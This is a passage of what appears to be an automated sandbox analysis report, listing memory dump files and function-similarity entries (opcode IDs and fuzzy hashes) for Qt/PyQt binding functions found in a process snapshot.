                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?clear@ItemModel@@Standard
                                                                                                                                                                                                                • String ID: QStandardItemModel$clear$clear(self)
                                                                                                                                                                                                                • API String ID: 2297373637-2567132944
                                                                                                                                                                                                                • Opcode ID: 09d784f04588ed62f861b1aece605f6eed9d2514d2c1e38e2acfe32f11d08d36
                                                                                                                                                                                                                • Instruction ID: d668956559edd89d35f0ed00aef9a4178af36d863b61bb0a34197f61bddc30e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d784f04588ed62f861b1aece605f6eed9d2514d2c1e38e2acfe32f11d08d36
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5801EDB5A08B5AC0EB109F65E8486A933A8FB55784F9140B2CA5D13320DF7CD545D740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                • String ID: QPixelFormat$cyanSize$cyanSize(self) -> int
                                                                                                                                                                                                                • API String ID: 3417993445-896624002
                                                                                                                                                                                                                • Opcode ID: ac26d8b08f78d977762e020f5cd82de948b3c7528124f726d0713d96de2e283e
                                                                                                                                                                                                                • Instruction ID: c8463ab09ae774ac3521aafb38d39aeb1981ae7df3160bfc707da24ff5ee62e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac26d8b08f78d977762e020f5cd82de948b3c7528124f726d0713d96de2e283e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB014FB5B08B46C1EB10DF60E8486A933A8FB94744FA140B6CA5D13320CF7DD649C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?endAbstractItemModel@@RemoveRows@
                                                                                                                                                                                                                • String ID: QStandardItemModel$endRemoveRows$endRemoveRows(self)
                                                                                                                                                                                                                • API String ID: 2070969689-968815932
                                                                                                                                                                                                                • Opcode ID: 3b71b633be4ed5ba1b6979656c89c87bcaadba234cd4c1faf94caa980013cec7
                                                                                                                                                                                                                • Instruction ID: c2e04b865b418c2ebce7990587c73e40092273c11f7dd97452c6e0c62546f7f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b71b633be4ed5ba1b6979656c89c87bcaadba234cd4c1faf94caa980013cec7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2010CB5A08A5AC0EB20DF65E8886A937B8FB55B84F9140B2CA5D43320DF7DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?removeCursor@@SelectedTextText@
                                                                                                                                                                                                                • String ID: QTextCursor$removeSelectedText$removeSelectedText(self)
                                                                                                                                                                                                                • API String ID: 4213397164-1153738210
                                                                                                                                                                                                                • Opcode ID: 2522616458def94d2267eeadd350cbbd06b454ec417ff84629a0ab10b20f820b
                                                                                                                                                                                                                • Instruction ID: dfab83dd2191138440782914e1c6aefd04dcefa9ea7e6fce28189905f6f75585
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2522616458def94d2267eeadd350cbbd06b454ec417ff84629a0ab10b20f820b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 420108B5A08B5BC0EB209F65E8886A933B8FB54B88F9141B2CA5D43330DF7DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QQuaternion$scalar$scalar(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-4033584825
                                                                                                                                                                                                                • Opcode ID: 59fc14935a47d114a24bbf8e9a77862103650fa064fc6c0405b2fff1c8fce54b
                                                                                                                                                                                                                • Instruction ID: 31b6d8dd152ba6630c318fdcfecd40584051c43e1b5f77aa57b063d307e25c41
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59fc14935a47d114a24bbf8e9a77862103650fa064fc6c0405b2fff1c8fce54b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51012CB1A08B8AC1EB11CF75D8886A933A8FB55B94F9180B2CA5C13320DF7CD689C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QTransform$m33$m33(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-641805950
                                                                                                                                                                                                                • Opcode ID: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                • Instruction ID: f1909250e2de6f5d4d8491fec56bc2df07a7796df8aeac022bcfa92a7650e71e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC012CB5A08F46C1EB10DF65E8886A937A8FB54B84FA140B2CE5C03320DF7DD949C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                • String ID: QRgba64$alpha$alpha(self) -> int
                                                                                                                                                                                                                • API String ID: 3417993445-1978412709
                                                                                                                                                                                                                • Opcode ID: 5109a770b60d83dc2ea33228b5b052612b8c352f9993d9dfd47978355699215f
                                                                                                                                                                                                                • Instruction ID: 04e183841082af64c59a6177196bf5e4cb7d232cd1cae08983edb3984f72e752
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5109a770b60d83dc2ea33228b5b052612b8c352f9993d9dfd47978355699215f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E014FB1B08B86C0EB50CF65E8586A937A8FB54B44F9180B2CE5C03320CF7CD59AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QTransform$m32$m32(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-3981345961
                                                                                                                                                                                                                • Opcode ID: 93f5d6cbfd27c051e03c5b1177ed63cf6f4e3c17f98bd18ed8298be2cba1d6e7
                                                                                                                                                                                                                • Instruction ID: 543ba80f410f99a5c235e4e9ffe9e78cedaf80d57105c7fdf6769f1b7de14655
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93f5d6cbfd27c051e03c5b1177ed63cf6f4e3c17f98bd18ed8298be2cba1d6e7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98012CB5A08F46C0EB10DF64E8986A933B8FB55B94FA140B2CA5C03320CF7DD58AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
